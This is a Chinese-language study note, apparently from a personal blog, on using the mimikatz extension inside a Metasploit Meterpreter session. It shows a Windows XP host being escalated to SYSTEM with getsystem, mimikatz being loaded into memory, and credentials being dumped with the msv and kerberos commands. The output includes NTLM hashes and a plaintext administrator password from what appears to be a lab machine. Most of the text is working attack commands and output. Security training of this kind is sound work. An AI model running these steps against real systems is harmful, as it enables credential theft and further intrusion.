[关闭]
@websec007 2017-04-20T14:02:39.000000Z 字数 2089 阅读 1422

meterprter shell 之 mimikatz

MSF学习笔记

参考连接:https://www.offensive-security.com/metasploit-unleashed/mimikatz/

一、Loading Mimikatz

1、查看当前系统权限

第一步,需要查看当前系统的权限,如果系统权限不是“管理员”或者“system”,则mimikatz模块无法加成成功。因为mimikata的模块在获取用户名密码时,需要最起码是超级管理员权限。

  1. meterpreter > getuid
  2. Server username: WINXP-E95CE571A1\Administrator
  3. meterpreter > getsystem
  4. got system (via technique 1).
  5. meterpreter > getuid
  6. Server username: NT AUTHORITY\SYSTEM

2、使用sysinfo查询当前系统架构

mimikatz支持32bit 和 64bit Windows架构,在获取system系统权限后,我们需要使用sysinfo命令来查询下当前系统的架构,为选择加载正确的mimikatz做好铺垫。

  1. meterpreter > sysinfo
  2. Computer : WINXP-E95CE571A1
  3. OS : Windows XP (Build 2600, Service Pack 3).
  4. Architecture : x86
  5. System Language : en_US
  6. Meterpreter : x86/win32

3、 加载mimikatz 到内存中

因为这是一个32位的机器,我们可以继续加载Mimikatz模块到内存。

  1. meterpreter > load mimikatz
  2. Loading extension mimikatz...success.
  3. meterpreter > help mimikatz
  4. Mimikatz Commands
  5. =================
  6. Command Description
  7. ------- -----------
  8. kerberos Attempt to retrieve kerberos creds
  9. livessp Attempt to retrieve livessp creds
  10. mimikatz_command Run a custom commannd
  11. msv Attempt to retrieve msv creds (hashes)
  12. ssp Attempt to retrieve ssp creds
  13. tspkg Attempt to retrieve tspkg creds
  14. wdigest Attempt to retrieve wdigest creds

当前版本信息查询

  1. meterpreter > mimikatz_command -f version
  2. mimikatz 1.0 x86 (RC) (Nov 7 2013 08:21:02)

4、从内存中读取Hashes值和Passwords密码

  1. meterpreter > msv
  2. [+] Running as SYSTEM
  3. [*] Retrieving msv credentials
  4. msv credentials
  5. ===============
  6. AuthID Package Domain User Password
  7. ------ ------- ------ ---- --------
  8. 0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f }
  9. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
  10. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
  11. 0;56683 NTLM n.s. (Credentials KO)
  12. 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO)
  1. meterpreter > kerberos
  2. [+] Running as SYSTEM
  3. [*] Retrieving kerberos credentials
  4. kerberos credentials
  5. ====================
  6. AuthID Package Domain User Password
  7. ------ ------- ------ ---- --------
  8. 0;999 NTLM WORKGROUP WINXP-E95CE571A1$
  9. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE
  10. 0;56683 NTLM
  11. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE
  12. 0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注